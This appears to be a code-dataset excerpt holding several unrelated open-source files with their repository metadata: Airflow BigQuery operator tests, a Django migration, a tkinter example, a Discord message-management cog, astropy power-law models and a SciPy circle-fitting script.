@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_failure(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value = MagicMock(job_id=real_job_id, error_result=True)
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
)
with pytest.raises(AirflowException):
op.execute({})
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_reattach(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.side_effect = Conflict("any")
job = MagicMock(
job_id=real_job_id,
error_result=False,
state="PENDING",
done=lambda: False,
)
mock_hook.return_value.get_job.return_value = job
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
reattach_states={"PENDING"},
)
result = op.execute({})
mock_hook.return_value.get_job.assert_called_once_with(
location=TEST_DATASET_LOCATION,
job_id=real_job_id,
project_id=TEST_GCP_PROJECT_ID,
)
job.result.assert_called_once_with()
assert result == real_job_id
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.uuid')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_force_rerun(self, mock_hook, mock_uuid, mock_md5):
job_id = "123456"
hash_ = mock_uuid.uuid4.return_value.encode.return_value
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
job = MagicMock(
job_id=real_job_id,
error_result=False,
)
mock_hook.return_value.insert_job.return_value = job
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
force_rerun=True,
)
result = op.execute({})
mock_hook.return_value.insert_job.assert_called_once_with(
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=real_job_id,
project_id=TEST_GCP_PROJECT_ID,
)
assert result == real_job_id
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_no_force_rerun(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value.result.side_effect = Conflict("any")
job = MagicMock(
job_id=real_job_id,
error_result=False,
state="DONE",
done=lambda: True,
)
mock_hook.return_value.get_job.return_value = job
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
reattach_states={"PENDING"},
)
# No force rerun
with pytest.raises(AirflowException):
op.execute({})
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@pytest.mark.parametrize(
"test_dag_id, expected_job_id",
[("test-dag-id-1.1", "airflow_test_dag_id_1_1_test_job_id_2020_01_23T00_00_00_00_00_hash")],
ids=["test-dag-id-1.1"],
)
def test_job_id_validity(self, mock_md5, test_dag_id, expected_job_id):
hash_ = "hash"
mock_md5.return_value.hexdigest.return_value = hash_
context = {"execution_date": datetime(2020, 1, 23)}
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
with DAG(dag_id=test_dag_id, start_date=datetime(2020, 1, 23)):
op = BigQueryInsertJobOperator(
task_id="test_job_id", configuration=configuration, project_id=TEST_GCP_PROJECT_ID
)
assert op._job_id(context) == expected_job_id
| 37.254753 | 110 | 0.640794 | [
"Apache-2.0"
] | 094459/airflow | tests/providers/google/cloud/operators/test_bigquery.py | 39,192 | Python |
# Generated by Django 2.2.12 on 2020-11-10 19:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0039_auto_20201110_2132'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='address_1',
field=models.CharField(default='', help_text='Address 1', max_length=500),
preserve_default=False,
),
migrations.AlterField(
model_name='profile',
name='address_2',
field=models.CharField(default='es', help_text='Address 2', max_length=500),
preserve_default=False,
),
]
| 26.576923 | 88 | 0.591896 | [
"MPL-2.0",
"MPL-2.0-no-copyleft-exception"
] | EslamRM/Eshhnli | core/migrations/0040_auto_20201110_2136.py | 691 | Python |
""" http://www.python-course.eu/tkinter_layout_management.php """
from tkinter import *
root = Tk()
w = Label(root, text="Red Sun", bg="red", fg="white")
w.pack()
w = Label(root, text="Green Grass", bg="green", fg="black")
w.pack(ipadx=10)
w = Label(root, text="Blue Sky", bg="blue", fg="white")
w.pack()
mainloop()
| 28.727273 | 65 | 0.651899 | [
"Apache-2.0"
] | modal/tktoolbox | tktoolbox/examples/layout/pack_ipadx.py | 316 | Python |
"""This is a python module containing a cog that implements commands that are
used to manage messages in the server.
e.g. "clear", delete all instances of a certain word, etc.
"""
import discord
from discord.ext import commands
import typing # For optional parameters.
import datetime # For comparing messages.
class Message_Management(commands.Cog):
def __init__(self, client):
self._client = client
self._anchors = {}
@commands.command(aliases = ["c"])
async def clear(self, ctx, amount: int = 5):
"""Clear AMOUNT messages from chat. Default is 5. Also deletes
the message that invoked this command.
Usage: "clear <amount>"
"""
# Delete the message that invoked this command.
await ctx.message.delete()
# Delete AMOUNT more messages.
await ctx.channel.purge(limit=amount)
@commands.command(aliases = ["cfu", "clear_user"])
async def clear_from_user(self, ctx, amount: typing.Optional[int]=5, *, username):
"""Clear AMOUNT messages from a specific user. Also deletes the message
that invoked this command.
Usage: "clear <amount> <username>"
Username is the discord username, not server nickname.
"""
# To keep track of how many messages we're searching through.
msgsSearched = 0
remaining = amount
# Delete the message that invoked this command.
await ctx.message.delete()
# Delete AMOUNT more messages from the user.
# Limit it to 1000 messages to prevent this from going on too long.
async for message in ctx.channel.history(limit=1000):
msgsSearched += 1
if message.author.name == username:
await message.delete()
remaining -= 1
if remaining == 0:
break
else:
await ctx.send(f"There were less than {amount} messages from {username} in the last {msgsSearched} messages.")
@commands.command(aliases=["adm"])
async def anchor_delete_manual(self, ctx):
"""Delete the messages between two anchors."""
# Check if the current channel already has an anchor.
if ctx.channel.id in self._anchors:
# Delete every message between the invocation message
# and the anchor.
async for message in ctx.channel.history(limit=None):
if message.id == self._anchors[ctx.channel.id]:
await message.delete() # Delete the message.
del self._anchors[ctx.channel.id] # Remove the anchor.
# Break from the loop, since we are done deleting.
break
else:
await message.delete()
else: # New anchors for this channel.
self._anchors[ctx.channel.id] = ctx.message.id
@commands.command(aliases=["adc"])
async def anchor_delete_choice(self, ctx, bottom: int, top: int):
"""Given the message ID's for two messages, delete all messages between them."""
# Fetch the two messages.
bottom_msg = await ctx.channel.fetch_message(bottom)
top_msg = await ctx.channel.fetch_message(top)
# Compare the messages to ensure the bottom anchor is younger.
if not bottom_msg.created_at > top_msg.created_at:
await ctx.send("Bottom anchor must come after top anchor.")
return # End the function.
# If that check passed, delete every message between the two.
anchored = False
num_deleted = 0
async for message in ctx.channel.history(limit=None):
# Start the deletion if we find the bottom anchor.
if message.id == bottom:
anchored = True
await message.delete()
num_deleted += 1
continue
if anchored:
num_deleted += 1
await message.delete()
if message.id == top: # If we find the top anchor, stop deleting.
anchored = False
break
# After deleting, print out how many messages were deleted,
# and delete the invocation message.
await ctx.send(f"Deleted {num_deleted} messages.")
await ctx.message.delete()
def setup(client):
client.add_cog(Message_Management(client))
| 40.176991 | 123 | 0.59141 | [
"MIT"
] | ThomScottW/DiscordBot | cogs/Message Management.py | 4,540 | Python |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Power law model variants
"""
# pylint: disable=invalid-name
import numpy as np
from astropy.units import Quantity
from .core import Fittable1DModel
from .parameters import InputParameterError, Parameter
__all__ = ['PowerLaw1D', 'BrokenPowerLaw1D', 'SmoothlyBrokenPowerLaw1D',
'ExponentialCutoffPowerLaw1D', 'LogParabola1D', 'Schechter1D']
class PowerLaw1D(Fittable1DModel):
"""
One dimensional power law model.
Parameters
----------
amplitude : float
Model amplitude at the reference point
x_0 : float
Reference point
alpha : float
Power law index
See Also
--------
BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D, LogParabola1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and :math:`\\alpha` for ``alpha``):
.. math:: f(x) = A (x / x_0) ^ {-\\alpha}
"""
amplitude = Parameter(default=1, description="Peak value at the reference point")
x_0 = Parameter(default=1, description="Reference point")
alpha = Parameter(default=1, description="Power law index")
@staticmethod
def evaluate(x, amplitude, x_0, alpha):
"""One dimensional power law model function"""
xx = x / x_0
return amplitude * xx ** (-alpha)
@staticmethod
def fit_deriv(x, amplitude, x_0, alpha):
"""One dimensional power law derivative with respect to parameters"""
xx = x / x_0
d_amplitude = xx ** (-alpha)
d_x_0 = amplitude * alpha * d_amplitude / x_0
d_alpha = -amplitude * d_amplitude * np.log(xx)
return [d_amplitude, d_x_0, d_alpha]
@property
def input_units(self):
if self.x_0.unit is None:
return None
return {self.inputs[0]: self.x_0.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_0': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class BrokenPowerLaw1D(Fittable1DModel):
"""
One dimensional power law model with a break.
Parameters
----------
amplitude : float
Model amplitude at the break point.
x_break : float
Break point.
alpha_1 : float
Power law index for x < x_break.
alpha_2 : float
Power law index for x > x_break.
See Also
--------
PowerLaw1D, ExponentialCutoffPowerLaw1D, LogParabola1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and :math:`\\alpha_1`
for ``alpha_1`` and :math:`\\alpha_2` for ``alpha_2``):
.. math::
f(x) = \\left \\{
\\begin{array}{ll}
A (x / x_{break}) ^ {-\\alpha_1} & : x < x_{break} \\\\
A (x / x_{break}) ^ {-\\alpha_2} & : x > x_{break} \\\\
\\end{array}
\\right.
"""
amplitude = Parameter(default=1, description="Peak value at break point")
x_break = Parameter(default=1, description="Break point")
alpha_1 = Parameter(default=1, description="Power law index before break point")
alpha_2 = Parameter(default=1, description="Power law index after break point")
@staticmethod
def evaluate(x, amplitude, x_break, alpha_1, alpha_2):
"""One dimensional broken power law model function"""
alpha = np.where(x < x_break, alpha_1, alpha_2)
xx = x / x_break
return amplitude * xx ** (-alpha)
@staticmethod
def fit_deriv(x, amplitude, x_break, alpha_1, alpha_2):
"""One dimensional broken power law derivative with respect to parameters"""
alpha = np.where(x < x_break, alpha_1, alpha_2)
xx = x / x_break
d_amplitude = xx ** (-alpha)
d_x_break = amplitude * alpha * d_amplitude / x_break
d_alpha = -amplitude * d_amplitude * np.log(xx)
d_alpha_1 = np.where(x < x_break, d_alpha, 0)
d_alpha_2 = np.where(x >= x_break, d_alpha, 0)
return [d_amplitude, d_x_break, d_alpha_1, d_alpha_2]
@property
def input_units(self):
if self.x_break.unit is None:
return None
return {self.inputs[0]: self.x_break.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_break': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class SmoothlyBrokenPowerLaw1D(Fittable1DModel):
"""One dimensional smoothly broken power law model.
Parameters
----------
amplitude : float
Model amplitude at the break point.
x_break : float
Break point.
alpha_1 : float
Power law index for ``x << x_break``.
alpha_2 : float
Power law index for ``x >> x_break``.
delta : float
Smoothness parameter.
See Also
--------
BrokenPowerLaw1D
Notes
-----
Model formula (with :math:`A` for ``amplitude``, :math:`x_b` for
``x_break``, :math:`\\alpha_1` for ``alpha_1``,
:math:`\\alpha_2` for ``alpha_2`` and :math:`\\Delta` for
``delta``):
.. math::
f(x) = A \\left( \\frac{x}{x_b} \\right) ^ {-\\alpha_1}
\\left\\{
\\frac{1}{2}
\\left[
1 + \\left( \\frac{x}{x_b}\\right)^{1 / \\Delta}
\\right]
\\right\\}^{(\\alpha_1 - \\alpha_2) \\Delta}
The change of slope occurs between the values :math:`x_1`
and :math:`x_2` such that:
.. math::
\\log_{10} \\frac{x_2}{x_b} = \\log_{10} \\frac{x_b}{x_1}
\\sim \\Delta
At values :math:`x \\lesssim x_1` and :math:`x \\gtrsim x_2` the
model is approximately a simple power law with index
:math:`\\alpha_1` and :math:`\\alpha_2` respectively. The two
power laws are smoothly joined at values :math:`x_1 < x < x_2`,
hence the :math:`\\Delta` parameter sets the "smoothness" of the
slope change.
The ``delta`` parameter is bounded to values greater than 1e-3
(corresponding to :math:`x_2 / x_1 \\gtrsim 1.002`) to avoid
overflow errors.
The ``amplitude`` parameter is bounded to positive values since
this model is typically used to represent positive quantities.
Examples
--------
.. plot::
:include-source:
import numpy as np
import matplotlib.pyplot as plt
from astropy.modeling import models
x = np.logspace(0.7, 2.3, 500)
f = models.SmoothlyBrokenPowerLaw1D(amplitude=1, x_break=20,
alpha_1=-2, alpha_2=2)
plt.figure()
plt.title("amplitude=1, x_break=20, alpha_1=-2, alpha_2=2")
f.delta = 0.5
plt.loglog(x, f(x), '--', label='delta=0.5')
f.delta = 0.3
plt.loglog(x, f(x), '-.', label='delta=0.3')
f.delta = 0.1
plt.loglog(x, f(x), label='delta=0.1')
plt.axis([x.min(), x.max(), 0.1, 1.1])
plt.legend(loc='lower center')
plt.grid(True)
plt.show()
"""
amplitude = Parameter(default=1, min=0, description="Peak value at break point")
x_break = Parameter(default=1, description="Break point")
alpha_1 = Parameter(default=-2, description="Power law index before break point")
alpha_2 = Parameter(default=2, description="Power law index after break point")
delta = Parameter(default=1, min=1.e-3, description="Smoothness Parameter")
@amplitude.validator
def amplitude(self, value):
if np.any(value <= 0):
raise InputParameterError(
"amplitude parameter must be > 0")
@delta.validator
def delta(self, value):
if np.any(value < 0.001):
raise InputParameterError(
"delta parameter must be >= 0.001")
@staticmethod
def evaluate(x, amplitude, x_break, alpha_1, alpha_2, delta):
"""One dimensional smoothly broken power law model function"""
# Pre-calculate `x/x_b`
xx = x / x_break
# Initialize the return value
f = np.zeros_like(xx, subok=False)
if isinstance(amplitude, Quantity):
return_unit = amplitude.unit
amplitude = amplitude.value
else:
return_unit = None
# The quantity `t = (x / x_b)^(1 / delta)` can become quite
# large. To avoid overflow errors we will start by calculating
# its natural logarithm:
logt = np.log(xx) / delta
# When `t >> 1` or `t << 1` we don't actually need to compute
# the `t` value since the main formula (see docstring) can be
# significantly simplified by neglecting `1` or `t`
# respectively. In the following we will check whether `t` is
# much greater, much smaller, or comparable to 1 by comparing
# the `logt` value with an appropriate threshold.
threshold = 30 # corresponding to exp(30) ~ 1e13
i = logt > threshold
if i.max():
# In this case the main formula reduces to a simple power
# law with index `alpha_2`.
f[i] = amplitude * xx[i] ** (-alpha_2) / (2. ** ((alpha_1 - alpha_2) * delta))
i = logt < -threshold
if i.max():
# In this case the main formula reduces to a simple power
# law with index `alpha_1`.
f[i] = amplitude * xx[i] ** (-alpha_1) / (2. ** ((alpha_1 - alpha_2) * delta))
i = np.abs(logt) <= threshold
if i.max():
# In this case the `t` value is "comparable" to 1, hence we
# we will evaluate the whole formula.
t = np.exp(logt[i])
r = (1. + t) / 2.
f[i] = amplitude * xx[i] ** (-alpha_1) * r ** ((alpha_1 - alpha_2) * delta)
if return_unit:
return Quantity(f, unit=return_unit, copy=False)
return f
@staticmethod
def fit_deriv(x, amplitude, x_break, alpha_1, alpha_2, delta):
"""One dimensional smoothly broken power law derivative with respect
to parameters"""
# Pre-calculate `x_b` and `x/x_b` and `logt` (see comments in
# SmoothlyBrokenPowerLaw1D.evaluate)
xx = x / x_break
logt = np.log(xx) / delta
# Initialize the return values
f = np.zeros_like(xx)
d_amplitude = np.zeros_like(xx)
d_x_break = np.zeros_like(xx)
d_alpha_1 = np.zeros_like(xx)
d_alpha_2 = np.zeros_like(xx)
d_delta = np.zeros_like(xx)
threshold = 30 # (see comments in SmoothlyBrokenPowerLaw1D.evaluate)
i = logt > threshold
if i.max():
f[i] = amplitude * xx[i] ** (-alpha_2) \
/ (2. ** ((alpha_1 - alpha_2) * delta))
d_amplitude[i] = f[i] / amplitude
d_x_break[i] = f[i] * alpha_2 / x_break
d_alpha_1[i] = f[i] * (-delta * np.log(2))
d_alpha_2[i] = f[i] * (-np.log(xx[i]) + delta * np.log(2))
d_delta[i] = f[i] * (-(alpha_1 - alpha_2) * np.log(2))
i = logt < -threshold
if i.max():
f[i] = amplitude * xx[i] ** (-alpha_1) \
/ (2. ** ((alpha_1 - alpha_2) * delta))
d_amplitude[i] = f[i] / amplitude
d_x_break[i] = f[i] * alpha_1 / x_break
d_alpha_1[i] = f[i] * (-np.log(xx[i]) - delta * np.log(2))
d_alpha_2[i] = f[i] * delta * np.log(2)
d_delta[i] = f[i] * (-(alpha_1 - alpha_2) * np.log(2))
i = np.abs(logt) <= threshold
if i.max():
t = np.exp(logt[i])
r = (1. + t) / 2.
f[i] = amplitude * xx[i] ** (-alpha_1) \
* r ** ((alpha_1 - alpha_2) * delta)
d_amplitude[i] = f[i] / amplitude
d_x_break[i] = f[i] * (alpha_1 - (alpha_1 - alpha_2) * t / 2. / r) / x_break
d_alpha_1[i] = f[i] * (-np.log(xx[i]) + delta * np.log(r))
d_alpha_2[i] = f[i] * (-delta * np.log(r))
d_delta[i] = f[i] * (alpha_1 - alpha_2) \
* (np.log(r) - t / (1. + t) / delta * np.log(xx[i]))
return [d_amplitude, d_x_break, d_alpha_1, d_alpha_2, d_delta]
@property
def input_units(self):
if self.x_break.unit is None:
return None
return {self.inputs[0]: self.x_break.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_break': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class ExponentialCutoffPowerLaw1D(Fittable1DModel):
"""
One dimensional power law model with an exponential cutoff.
Parameters
----------
amplitude : float
Model amplitude
x_0 : float
Reference point
alpha : float
Power law index
x_cutoff : float
Cutoff point
See Also
--------
PowerLaw1D, BrokenPowerLaw1D, LogParabola1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and :math:`\\alpha` for ``alpha``):
.. math:: f(x) = A (x / x_0) ^ {-\\alpha} \\exp (-x / x_{cutoff})
"""
amplitude = Parameter(default=1, description="Peak value of model")
x_0 = Parameter(default=1, description="Reference point")
alpha = Parameter(default=1, description="Power law index")
x_cutoff = Parameter(default=1, description="Cutoff point")
@staticmethod
def evaluate(x, amplitude, x_0, alpha, x_cutoff):
"""One dimensional exponential cutoff power law model function"""
xx = x / x_0
return amplitude * xx ** (-alpha) * np.exp(-x / x_cutoff)
@staticmethod
def fit_deriv(x, amplitude, x_0, alpha, x_cutoff):
"""One dimensional exponential cutoff power law derivative with respect to parameters"""
xx = x / x_0
xc = x / x_cutoff
d_amplitude = xx ** (-alpha) * np.exp(-xc)
d_x_0 = alpha * amplitude * d_amplitude / x_0
d_alpha = -amplitude * d_amplitude * np.log(xx)
d_x_cutoff = amplitude * x * d_amplitude / x_cutoff ** 2
return [d_amplitude, d_x_0, d_alpha, d_x_cutoff]
@property
def input_units(self):
if self.x_0.unit is None:
return None
return {self.inputs[0]: self.x_0.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_0': inputs_unit[self.inputs[0]],
'x_cutoff': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class LogParabola1D(Fittable1DModel):
"""
One dimensional log parabola model (sometimes called curved power law).
Parameters
----------
amplitude : float
Model amplitude
x_0 : float
Reference point
alpha : float
Power law index
beta : float
Power law curvature
See Also
--------
PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and
:math:`\\alpha` for ``alpha`` and :math:`\\beta` for ``beta``):
.. math:: f(x) = A \\left(
\\frac{x}{x_{0}}\\right)^{- \\alpha - \\beta \\log{\\left (\\frac{x}{x_{0}}
\\right )}}
"""
amplitude = Parameter(default=1, description="Peak value of model")
x_0 = Parameter(default=1, description="Reference point")
alpha = Parameter(default=1, description="Power law index")
beta = Parameter(default=0, description="Power law curvature")
@staticmethod
def evaluate(x, amplitude, x_0, alpha, beta):
"""One dimensional log parabola model function"""
xx = x / x_0
exponent = -alpha - beta * np.log(xx)
return amplitude * xx ** exponent
@staticmethod
def fit_deriv(x, amplitude, x_0, alpha, beta):
"""One dimensional log parabola derivative with respect to parameters"""
xx = x / x_0
log_xx = np.log(xx)
exponent = -alpha - beta * log_xx
d_amplitude = xx ** exponent
d_beta = -amplitude * d_amplitude * log_xx ** 2
d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)
d_alpha = -amplitude * d_amplitude * log_xx
return [d_amplitude, d_x_0, d_alpha, d_beta]
@property
def input_units(self):
if self.x_0.unit is None:
return None
return {self.inputs[0]: self.x_0.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_0': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class Schechter1D(Fittable1DModel):
r"""
Schechter luminosity function (`Schechter 1976
<https://ui.adsabs.harvard.edu/abs/1976ApJ...203..297S/abstract>`_),
parameterized in terms of magnitudes.
Parameters
----------
phi_star : float
The normalization factor in units of number density.
m_star : float
The characteristic magnitude where the power-law form of the
function cuts off. Must not have units.
alpha : float
The power law index, also known as the faint-end slope. Must not
have units.
See Also
--------
PowerLaw1D, ExponentialCutoffPowerLaw1D, BrokenPowerLaw1D
Notes
-----
Model formula (with :math:`\phi^{*}` for ``phi_star``, :math:`M^{*}`
for ``m_star``, and :math:`\alpha` for ``alpha``):
.. math::
n(M) \ dM = (0.4 \ln 10) \ \phi^{*} \
[{10^{0.4 (M^{*} - M)}}]^{\alpha + 1} \
\exp{[-10^{0.4 (M^{*} - M)}]} \ dM
``phi_star`` is the normalization factor in units of number density.
``m_star`` is the characteristic magnitude where the power-law form
of the function cuts off into the exponential form. ``alpha`` is
the power-law index, defining the faint-end slope of the luminosity
function.
Examples
--------
.. plot::
:include-source:
from astropy.modeling.models import Schechter1D
import astropy.units as u
import matplotlib.pyplot as plt
import numpy as np
phi_star = 4.3e-4 * (u.Mpc ** -3)
m_star = -20.26
alpha = -1.98
model = Schechter1D(phi_star, m_star, alpha)
mag = np.linspace(-25, -17)
fig, ax = plt.subplots()
ax.plot(mag, model(mag))
ax.set_yscale('log')
ax.set_xlim(-22.6, -17)
ax.set_ylim(1.e-7, 1.e-2)
ax.set_xlabel('$M_{UV}$')
ax.set_ylabel('$\phi$ [mag$^{-1}$ Mpc$^{-3}]$')
References
----------
.. [1] Schechter 1976; ApJ 203, 297
(https://ui.adsabs.harvard.edu/abs/1976ApJ...203..297S/abstract)
.. [2] `Luminosity function <https://en.wikipedia.org/wiki/Luminosity_function_(astronomy)>`_
"""
phi_star = Parameter(default=1., description=('Normalization factor '
'in units of number density'))
m_star = Parameter(default=-20., description='Characteristic magnitude')
alpha = Parameter(default=-1., description='Faint-end slope')
@staticmethod
def evaluate(mag, phi_star, m_star, alpha):
"""Schechter luminosity function model function."""
if isinstance(mag, Quantity) or isinstance(m_star, Quantity):
raise ValueError('mag and m_star must not have units')
factor = 10 ** (0.4 * (m_star - mag))
return (0.4 * np.log(10) * phi_star * factor**(alpha + 1)
* np.exp(-factor))
@staticmethod
def fit_deriv(mag, phi_star, m_star, alpha):
"""
Schechter luminosity function derivative with respect to
parameters.
"""
if isinstance(mag, Quantity) or isinstance(m_star, Quantity):
raise ValueError('mag and m_star must not have units')
factor = 10 ** (0.4 * (m_star - mag))
d_phi_star = 0.4 * np.log(10) * factor**(alpha + 1) * np.exp(-factor)
func = phi_star * d_phi_star
d_m_star = ((alpha + 1) * 0.4 * np.log(10) * func
- (0.4 * np.log(10) * func * factor))
d_alpha = func * np.log(factor)
return [d_phi_star, d_m_star, d_alpha]
@property
def input_units(self):
if self.m_star.unit is None:
return None
return {self.inputs[0]: self.m_star.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'m_star': inputs_unit[self.inputs[0]],
'phi_star': outputs_unit[self.outputs[0]]}
| 32.896166 | 97 | 0.577332 | [
"BSD-3-Clause"
] | JefftheCloudDog/astropy | astropy/modeling/powerlaws.py | 20,593 | Python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
http://www.scipy.org/Cookbook/Least_Squares_Circle
"""
from numpy import *
# Coordinates of the 2D points
# x = r_[ 9, 35, -13, 10, 23, 0]
# y = r_[ 34, 10, 6, -14, 27, -10]
x = r_[36, 36, 19, 18, 33, 26]
y = r_[14, 10, 28, 31, 18, 26]
# R0 = 25
# nb_pts = 8
# dR = 2
# angle =9*pi/5
# x = (10 + R0*cos(theta0) + dR*random.normal(size=nb_pts)).round()
# y = (10 + R0*sin(theta0) + dR*random.normal(size=nb_pts)).round()
# == METHOD 1 ==
method_1 = 'algebraic'
# coordinates of the barycenter
x_m = mean(x)
y_m = mean(y)
# calculation of the reduced coordinates
u = x - x_m
v = y - y_m
# linear system defining the center in reduced coordinates (uc, vc):
# Suu * uc + Suv * vc = (Suuu + Suvv)/2
# Suv * uc + Svv * vc = (Suuv + Svvv)/2
Suv = sum(u*v)
Suu = sum(u**2)
Svv = sum(v**2)
Suuv = sum(u**2 * v)
Suvv = sum(u * v**2)
Suuu = sum(u**3)
Svvv = sum(v**3)
# Solving the linear system
A = array([ [ Suu, Suv ], [Suv, Svv]])
B = array([ Suuu + Suvv, Svvv + Suuv ])/2.0
uc, vc = linalg.solve(A, B)
xc_1 = x_m + uc
yc_1 = y_m + vc
# Calculation of all distances from the center (xc_1, yc_1)
Ri_1 = sqrt((x-xc_1)**2 + (y-yc_1)**2)
R_1 = mean(Ri_1)
residu_1 = sum((Ri_1-R_1)**2)
residu2_1= sum((Ri_1**2-R_1**2)**2)
# Decorator to count functions calls
import functools
def countcalls(fn):
"decorator function count function calls "
@functools.wraps(fn)
def wrapped(*args):
wrapped.ncalls +=1
return fn(*args)
wrapped.ncalls = 0
return wrapped
# == METHOD 2 ==
from scipy import optimize
method_2 = "leastsq"
def calc_R(c):
""" calculate the distance of each 2D points from the center c=(xc, yc) """
return sqrt((x-c[0])**2 + (y-c[1])**2)
@countcalls
def f_2(c):
""" calculate the algebraic distance between the 2D points and the mean circle centered at c=(xc, yc) """
Ri = calc_R(c)
return Ri - Ri.mean()
center_estimate = x_m, y_m
center_2, ier = optimize.leastsq(f_2, center_estimate)
xc_2, yc_2 = center_2
Ri_2 = calc_R(center_2)
R_2 = Ri_2.mean()
residu_2 = sum((Ri_2 - R_2)**2)
residu2_2 = sum((Ri_2**2-R_2**2)**2)
ncalls_2 = f_2.ncalls
# == METHOD 3 ==
from scipy import odr
method_3 = "odr"
@countcalls
def f_3(beta, x):
""" implicit function of the circle """
xc, yc, r = beta
return (x[0]-xc)**2 + (x[1]-yc)**2 -r**2
def calc_estimate(data):
""" Return a first estimation on the parameter from the data """
xc0, yc0 = data.x.mean(axis=1)
r0 = sqrt((data.x[0]-xc0)**2 +(data.x[1] -yc0)**2).mean()
return xc0, yc0, r0
# for implicit function :
# data.x contains both coordinates of the points
# data.y is the dimensionality of the response
lsc_data = odr.Data(row_stack([x, y]), y=1)
lsc_model = odr.Model(f_3, implicit=True, estimate=calc_estimate)
lsc_odr = odr.ODR(lsc_data, lsc_model)
lsc_out = lsc_odr.run()
xc_3, yc_3, R_3 = lsc_out.beta
Ri_3 = calc_R([xc_3, yc_3])
residu_3 = sum((Ri_3 - R_3)**2)
residu2_3 = sum((Ri_3**2-R_3**2)**2)
ncalls_3 = f_3.ncalls
print 'lsc_out.sum_square = ',lsc_out.sum_square
# == METHOD 4 ==
method_4 = "odr with jacobian"
@countcalls
def f_4(beta, x):
""" implicit function of the circle """
xc, yc, r = beta
xi, yi = x
return (xi-xc)**2 + (yi-yc)**2 -r**2
@countcalls
def jacb(beta, x):
""" Jacobian function with respect to the parameters beta.
return df/dbeta
"""
xc, yc, r = beta
xi, yi = x
df_db = empty((beta.size, x.shape[1]))
df_db[0] = 2*(xc-xi) # d_f/dxc
df_db[1] = 2*(yc-yi) # d_f/dyc
df_db[2] = -2*r # d_f/dr
return df_db
@countcalls
def jacd(beta, x):
""" Jacobian function with respect to the input x.
return df/dx
"""
xc, yc, r = beta
xi, yi = x
df_dx = empty_like(x)
df_dx[0] = 2*(xi-xc) # d_f/dxi
df_dx[1] = 2*(yi-yc) # d_f/dyi
return df_dx
def calc_estimate(data):
""" Return a first estimation on the parameter from the data """
xc0, yc0 = data.x.mean(axis=1)
r0 = sqrt((data.x[0]-xc0)**2 +(data.x[1] -yc0)**2).mean()
return xc0, yc0, r0
# for implicit function :
# data.x contains both coordinates of the points
# data.y is the dimensionality of the response
lsc_data = odr.Data(row_stack([x, y]), y=1)
lsc_model = odr.Model(f_4, implicit=True, estimate=calc_estimate, fjacd=jacd, fjacb=jacb)
lsc_odr = odr.ODR(lsc_data, lsc_model)
lsc_odr.set_job(deriv=3) # use user derivatives function without checking
lsc_out = lsc_odr.run()
xc_4, yc_4, R_4 = lsc_out.beta
